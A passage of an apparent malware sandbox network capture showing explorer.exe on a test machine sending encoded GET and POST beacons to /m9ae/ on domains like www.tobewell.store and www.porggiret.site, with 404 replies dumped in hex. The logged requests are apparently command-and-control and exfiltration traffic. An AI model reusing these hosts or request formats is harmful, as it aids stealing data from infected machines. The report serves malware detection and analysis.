                                                                                                                        Data Ascii: F6z4=oYV0CaPHWHw5DXf5fK9prcfT99EXVx5YRItJTG7cMkXuhl9INMAL(yErDf~D4MX0x1XuozjNP9BbKffw9OvAu8T2It~2jB5YsY1so4UhbzNQSAcY3bkV3faaNkGXagp7UVILMeKg8e7FSjqAtTTx(k3BfDxe1t43Gnr6pCzhQYkh94z4WA).
                                                                                                                        Nov 29, 2022 10:35:45.448339939 CET298INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 570
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        24192.168.2.549739198.54.121.8180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:47.395817995 CET299OUTGET /m9ae/?F6z4=la9UBuDbTkNYLSjTdKhHvd+t7tYwPiF7FtZOQELnOBzejFZlEJsWuQ55NoeYz7TqoHjnmCP3NdRIHdLBoOXytpXMXLmthCtowg==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.porggiret.site
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:35:47.697973967 CET300INHTTP/1.1 404 Not Found
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:47 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 570
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        25192.168.2.549740178.208.83.2080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:52.809756041 CET301OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.tobewell.store
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.tobewell.store
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.tobewell.store/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 46 61 6f 46 4f 51 30 67 4a 39 4b 33 36 55 38 6d 50 42 41 6f 35 6f 62 72 78 31 48 48 4a 74 66 36 78 38 4e 71 70 57 67 76 47 33 76 52 37 76 30 35 57 6d 33 67 6a 36 58 42 62 79 39 79 43 39 4a 46 38 79 47 50 63 55 59 61 6a 5f 72 61 70 56 43 57 7a 69 28 76 6b 57 75 65 36 34 75 65 36 4d 30 48 6e 67 73 6f 70 34 77 77 54 46 4d 53 41 72 65 4c 77 37 71 5a 67 4a 46 71 67 70 4d 51 45 68 6e 39 4c 62 66 61 47 6a 43 4f 31 38 37 46 77 4a 6e 2d 28 77 78 58 47 4f 45 64 45 51 61 46 65 47 79 6b 44 67 77 4e 44 36 35 64 4b 64 36 62 73 52 41 6b 6b 4d 61 6e 5a 43 5a 38 79 64 73 33 6e 50 6c 42 5a 38 44 65 47 63 64 35 51 48 53 6a 54 56 50 6f 58 67 4c 75 70 32 66 6d 38 38 39 41 51 6c 33 6b 4d 37 37 55 33 4b 62 68 53 49 68 33 7e 45 61 54 6f 51 77 38 4c 78 49 79 37 48 36 2d 48 32 6e 73 51 7a 28 31 43 5a 28 31 72 38 59 55 66 53 28 6d 50 35 70 50 38 6d 4d 41 39 44 32 4d 37 51 66 6a 6a 47 32 43 53 6c 38 67 6e 63 4e 6f 4d 70 32 39 6c 65 38 67 58 30 33 51 36 78 58 4e 6a 57 58 56 61 36 4d 33 41 4d 68 41 38 30 48 62 4d 58 64 53 33 7a 38 6a 7a 7a 51 76 43 58 38 43 38 58 36 73 77 7a 73 56 57 35 4c 37 46 4e 4f 6c 4f 44 68 52 7a 4d 67 5a 35 48 33 46 53 57 51 75 69 53 36 78 62 70 7a 56 70 4e 46 67 70 48 64 58 32 5a 43 30 79 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=FaoFOQ0gJ9K36U8mPBAo5obrx1HHJtf6x8NqpWgvG3vR7v05Wm3gj6XBby9yC9JF8yGPcUYaj_rapVCWzi(vkWue64ue6M0Hngsop4wwTFMSAreLw7qZgJFqgpMQEhn9LbfaGjCO187FwJn-(wxXGOEdEQaFeGykDgwND65dKd6bsRAkkManZCZ8yds3nPlBZ8DeGcd5QHSjTVPoXgLup2fm889AQl3kM77U3KbhSIh3~EaToQw8LxIy7H6-H2nsQz(1CZ(1r8YUfS(mP5pP8mMA9D2M7QfjjG2CSl8gncNoMp29le8gX03Q6xXNjWXVa6M3AMhA80HbMXdS3z8jzzQvCX8C8X6swzsVW5L7FNOlODhRzMgZ5H3FSWQuiS6xbpzVpNFgpHdX2ZC0yw).
                                                                                                                        Nov 29, 2022 10:35:52.836494923 CET303INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:52 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                                                                                                                        ETag: W/"6b40108-56e-561ca595b5880"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl**?z(ZLfA3Nw`<)Fdxc)\*3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<ZEG_o'WVcilCyWo]qvEo< <WgT8q1BUTZ^22p[#BvPLaDhdpJ(id*NGw`QvuELSk)A2YrA~'D5U(*E2].'P$|Ko;V?@X^YabN1&4px*Q}-'&_v ML}L=KEQ0vSaNePhIyEji/h2K5D:CHY'Ij2v_cBkSEZ:/O n0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        26192.168.2.549741178.208.83.2080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:54.859528065 CET304OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.tobewell.store
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.tobewell.store
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.tobewell.store/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 46 61 6f 46 4f 51 30 67 4a 39 4b 33 37 6e 55 6d 4e 33 49 6f 78 49 62 72 39 56 48 46 4a 74 66 35 78 38 4e 75 70 54 59 5f 48 45 50 52 36 37 34 35 57 55 76 67 67 36 58 41 51 53 39 32 4d 64 4a 63 38 79 48 73 63 56 30 61 6a 5f 28 61 70 56 79 57 7a 56 54 73 32 47 75 63 34 34 75 66 74 63 31 4e 6e 67 67 38 70 34 63 77 54 47 30 53 41 38 7e 4c 77 4a 43 61 6e 70 46 72 39 5a 4d 58 4c 42 6e 78 4c 62 65 37 47 6a 43 67 31 2d 7a 46 77 5a 33 2d 7e 53 5a 55 50 4f 45 59 4f 77 62 4f 51 45 6e 42 4c 68 46 46 57 72 51 4b 56 65 58 6c 34 68 73 76 34 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=FaoFOQ0gJ9K37nUmN3IoxIbr9VHFJtf5x8NupTY_HEPR6745WUvgg6XAQS92MdJc8yHscV0aj_(apVyWzVTs2Guc44uftc1Nngg8p4cwTG0SA8~LwJCanpFr9ZMXLBnxLbe7GjCg1-zFwZ3-~SZUPOEYOwbOQEnBLhFFWrQKVeXl4hsv4A).
                                                                                                                        Nov 29, 2022 10:35:54.885195017 CET305INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:54 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                                                                                                                        ETag: W/"6b40108-56e-561ca595b5880"
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 33 30 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 54 cd 8e d3 48 10 be e7 29 0a 5f b8 4c e2 84 24 fc ad 13 09 06 d0 8c b4 c0 81 e1 c0 b1 d3 2e c7 cd b4 dd a6 bb 3c 1e bf 23 97 7d 00 24 0b 88 14 10 19 cd 44 62 f7 ba d5 76 82 34 ec 68 b9 70 b0 e2 b6 ea fb ab aa 4e 74 74 f2 fc cf 79 74 f4 f4 d1 93 79 2f 22 45 1a e7 93 e1 04 5e 18 82 67 a6 cc 63 e8 c3 5f db cb 66 b3 fe bb 81 cd 0a 36 cd 97 cf ab 4d 13 85 5d 69 2f ca 90 04 a4 44 45 1f df 95 ea 6c 16 1c 9a 9c 30 a7 fe 49 5d 60 00 b2 3b cd 02 c2 73 0a 53 ca f4 1f 20 53 61 1d d2 ac 52 79 6c 2a d7 1f dd 99 8e 02 a6 d2 2a 3f 05 8b 7a 16 28 86 05 90 5a 4c 66 41 98 88 33 7f 9e 4e c7 77 13 f9 60 3c 19 e3 03 b1 18 0a 29 86 f7 46 e3 e9 64 78 7f 12 c7 63 29 07 5c 14 00 b1 2a e3 33 b1 c4 f0 bc df f1 84 d7 b8 5d 6a 2c c9 92 e0 f7 8b 84 bb 36 3e 7e f9 e4 0d ff 48 0e 8e 96 5f c4 4e c5 b7 c9 3d 0c c3 4c a6 c6 d1 c0 96 61 30 8f 54 b6 04 67 25 7b c8 a4 36 4b f3 4b 0b 6f 8b 65 00 42 73 4f df 37 5f bf 5f 5c 6d 03 58 18 1b a3 9d 05 43 e6 0b c5 3c 5a d8 f6 e9 45 47 a3 eb d3 f4 5f 0f 6f 1a 27 17 b6 88 0f db 06 ae f6 05 57 9f 56 9b d5 e5 fa f2 e2 63 b3 69 a0 f9 b8 bd f8 d6 6c d7 ff ac ae be ae e1 7f 43 79 57 eb cd a7 8b 6f b0 b3 e8 5d 71 7f 76 8d 09 db a5 eb 45 b7 fa fd 1e 00 6f d8 eb 3c e1 a1 94 b9 20 d4 f5 01 3c 57 d2 1a 67 12 82 54 38 10 71 8c 31 08 90 1a cf d0 42 8e 55 07 0a 12 14 54 5a 5e 32 32 70 ec 5b 9d 23 c1 d3 f3 42 1b 8b 76 00 c7 09 50 8a e0 17 0f 4c d2 61 44 0e 68 ad b1 b7 1d 64 e8 1c 0f 10 94 83 80 8c 01 97 09 ad 83 03 70 05 4a 95 28 c9 a7 ba 03 69 ae 64 2a c6 4e 47 77 60 51 13 ba 83 ff 0a f2 76 b1 9b dc 75 18 45 0e 4c b5 53 db 6b 0d e0 8d 29 41 32 91 af f4 94 de 59 72 d0 41 16 7e 27 89 9d 15 cc 44 35 90 55 f2 b4 f6 e1 12 be 28 e0 2a 45 32 05 ef 0b e3 5d 07 d8 b3 a5 eb 1a 2e 18 c0 89 27 ce 50 e4 ec d3 24 7c 07 4b be 6f 3b 95 56 b4 bd 03 3f e1 40 58 04 5e 59 c7 61 62 4e 09 31 26 a2 d4 34 e8 70 c7 c7 af 78 e9 2a 51 bb 7d d0 9f f1 2d b3 27 d1 26 5f 76 20 cc 4d b9 4c 7d 84 4c 9c e2 0d 3d 4b 45 51 d4 de 30 76 80 ca d8 53 61 db ff 1d f5 a3 11 4e 65 85 c6 87 50 88 b8 9d 68 ab db d5 ef 87 c8 bd 49 79 45 16 6a c9 69 b3 8c 2f 1e 68 c5 8a 94 32 0d cb 17 a5 4b b9 b9 1d c8 f8 35 f2 44 89 3a 43 48 59 cc 27 16 ac 49 15 6a fe d4 8e 18 32 95 ab ac cc 76 f9 5f fe e8 63 1b 94 c7 84 e7 42 92 ae a1 f2 b9 6b 53 de e6 e8 16 45 ac f6 e9 ad 5a a6 04 b9 a9 3a 8a fe bc f7 2f 4f 20 91 d7 6e 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 309TH)_L$.<#}$Dbv4hpNttyty/"E^gc_f6M]i/DEl0I]`;sS SaRyl**?z(ZLfA3Nw`<)Fdxc)\*3]j,6>~H_N=La0Tg%{6KKoeBsO7__\mXC<ZEG_o'WVcilCyWo]qvEo< <WgT8q1BUTZ^22p[#BvPLaDhdpJ(id*NGw`QvuELSk)A2YrA~'D5U(*E2].'P$|Ko;V?@X^YabN1&4px*Q}-'&_v ML}L=KEQ0vSaNePhIyEji/h2K5D:CHY'Ij2v_cBkSEZ:/O n0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        27192.168.2.549742178.208.83.2080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:56.906430960 CET305OUTGET /m9ae/?F6z4=IYAlNlE+FJHaxy8xKQwy2r7+8XL3SaTnyfpqtFACBxvA1+IYQm/X+/KTYzdsJPpQzBa/f1IulPzZtkKHtHHlpgqy4oXa9op1jw==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.tobewell.store
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:35:56.932915926 CET307INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:56 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 1390
                                                                                                                        Connection: close
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Last-Modified: Tue, 02 Jan 2018 12:36:34 GMT
                                                                                                                        ETag: "6b40108-56e-561ca595b5880"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 d1 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 6d 63 6c 6f 67 6f 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 6a 70 67 22 20 61 6c 74 3d 22 cc e0 ea f5 ee f1 f2 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 62 72 3e 3c 62 72 3e 0a 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 62 72 3e 43 f2 f0 e0 ed e8 f6 e0 20 ed e5 20 ed e0 e9 e4 e5 ed e0 3c 2f 48 31 3e 3c 62 72 3e 0a dd f2 e0 20 f1 f2 f0 e0 ed e8 f6 e0 20 f1 e3 e5 ed e5 f0 e8 f0 ee e2 e0 ed e0 20 e0 e2 f2 ee ec e0 f2 e8 f7 e5 f1 ea e8 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 63 68 6f 73 74 2e 72 75 2f 22 3e f5 ee f1 f2 e8 ed e3 ee ec 20 cc e0 ea f5 ee f1 f2 3c 2f 61 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68
